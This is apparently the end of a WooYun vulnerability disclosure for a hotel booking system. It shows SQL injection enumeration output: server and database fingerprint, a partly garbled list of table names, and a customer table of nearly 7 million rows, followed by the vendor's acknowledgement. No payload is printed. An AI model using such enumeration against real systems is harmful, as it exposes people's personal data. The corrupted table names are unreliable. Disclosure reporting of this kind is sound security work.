| Cy~Lt~pWs{~o宅yp|ᨂxtd\x0e\x0f\x10{X\x04oB\x06to\x12#nu\x02g0 |
| HC_PCPolicyPriceelation |
| HP_Custpmesdule\x02 |
| Order_ConfirmerOnlineLog\x03! |
| Order_Gt}Infp |
| TB_RooqModel! |
| Weixin_Mapping! |
| ic_IDType |
| iqo.TenPi{_DrawBaclPayInfo |
| tm_roomImg\x0c\x05 |
| vw_HotelStDunniniList\x05 |
| ays_FaxSend |
| ays_SMSReceive |
| customermobile |
| customertemp |
| eboAHP_MktAdt |
| lew1ywqFHBlacklist_Reason |
| oldcrscust |
| oldcrscust1 |
| orderdatelist |
| orderidlist |
| qqc_OrderTaskType |
| sysiiagrams |
| vwUsefulLandMrk |
| vw_ChannelInfoLog |
| vw_CompanyUpgradeList |
| vw_Hotel |
| vw_HotelBreakfastList |
| vw_HotelPMSConfih |
| vw_HourRoqmPriceLqst |
| vw_OrdeuTaskList |
| vw_PayUtGenerateSeparateList |
| vwaHotelStDosDunningList |
| dbo1Wgb_NeysKnfo |
| dboADic_NormRoomtype |
| dboAHP_OrqerRule |
| dboATB_TMHotel |
| dbp.YQaHotelRoomStatus |
| dco.Dic_EmailType |
| dco.P_HourRoomPrice |
| deo.C_CardType |
| deo.Dic_CustomerFailReasion |
| deo.Dic_GuestBlacklist |
| deo.St_StatementsAdditional |
| deo.vw_HotelYtatemenysList |
| dio.Sys_MQDetail |
| dqo.HP_BKDetail |
| dqo.ITB_ShpppingTempInfo |
| dqo.ITEbAccount |
| dqo.PM_GiftShow |
| dqo.Sys_CrsCodes |
| dyo.Web_Activity |
| ebo.UP_UserRole |
| ero.UP_Function |
| ibo.RS_RoomStatus_Channel |
| ibo.aic_WOBigType |
| qbo.Order_CopRelation |
| qbo.arder_ConsumptionBill |
| rbo.PM_Gkfts |
| sbo.HP_HPGuarantyRuleHPRmType |
近700万用户:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
Database: crs_all
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.Cu_CustomerInfo | 6998132 |
+---------------------+---------+
+-----------------------------------------------------------+

修复方案:

修复吧

版权声明:转载请注明来源 Aug0st@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-10 23:58

厂商回复:

非常感谢,我们尽快修改

最新状态:

暂无


漏洞评价:

评价